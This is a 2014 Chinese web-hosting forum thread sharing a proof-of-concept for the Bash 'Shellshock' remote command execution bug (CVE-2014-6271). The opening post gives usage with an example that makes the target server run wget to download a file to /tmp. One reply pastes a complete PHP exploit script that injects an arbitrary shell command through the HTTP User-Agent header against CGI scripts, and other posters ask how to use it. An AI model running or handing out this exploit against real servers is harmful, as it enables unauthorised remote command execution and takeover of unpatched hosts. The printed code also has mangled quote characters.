全球主机交流论坛

标题: BASH远程命令执行漏洞【POC】 [打印本页]

作者: aming    时间: 2014-9-25 19:44
标题: BASH远程命令执行漏洞【POC】
BASH远程命令执行漏洞【POC】

使用方法:

php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd

例子:
php bash.php -u http://localhost/cgi-bin/hello -c "wget http://website.com-O /tmp/shit"

谁有账号?

https://www.t00ls.net/thread-27957-1-1.html
作者: xfspace    时间: 2014-9-25 19:55
标题党啊
作者: wmfy808    时间: 2014-9-25 20:05
到底怎么使用
作者: 卖女孩的小火柴    时间: 2014-9-25 20:08
提示: 作者被禁止或删除 内容自动屏蔽
作者: aming    时间: 2014-9-25 20:24
卖女孩的小火柴 发表于 2014-9-25 20:08
bash.php搞一个过来

谁有账号?

https://www.t00ls.net/thread-27957-1-1.html
作者: Polymer_dg    时间: 2014-9-25 20:50

   

    <?php  
    /*  
    CVE: 2014-6271  
    Vendor Homepage: https://www.gnu.org/software/bash/  
    Author: Prakhar Prasad && Subho Halder  
    Author Homepage: https://prakharprasad.com && https://appknox.com  
    Date: September 25th 2014  
    Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26  
    GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)  
    Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd  
    Test CGI Code : #!/bin/bash  
    echo “Content-type: text/html”  
    echo “”  
    echo “Bash-is-Vulnerable”  
    */   
    error_reporting( 0 );  
    if (!defined(‘STDIN’)) die( “Please run it through command-line!\n” );  
    $x = getopt( “u:c:” );  
    if (!isset($x['u']) || !isset($x['c']))  
    {  
    die( “Usage: “ .$_SERVER['PHP_SELF']. ” -u URL -c cmd\n” );  
    }  
    $url = $x['u'];  
    $cmd = $x['c'];  
    $context = stream_context_create(  
    array(  
    ‘http’ => array(  
    ‘method’ => ‘GET’,  
    ‘header’ => ‘User-Agent: () { :;}; /bin/bash -c  “‘.$cmd.’” ‘  
    )  
    )  
    );  
      
    if (!file_get_contents($url,  false , $context) && strpos($http_response_header[ 0 ], “500″ ) >  0 )  
    die( “Command sent to the server!\n” );  
    else   
    die( “Connection Error\n” );  
    ?>  






欢迎光临 全球主机交流论坛 (https://lilynana.eu.org/) Powered by Discuz! X3.4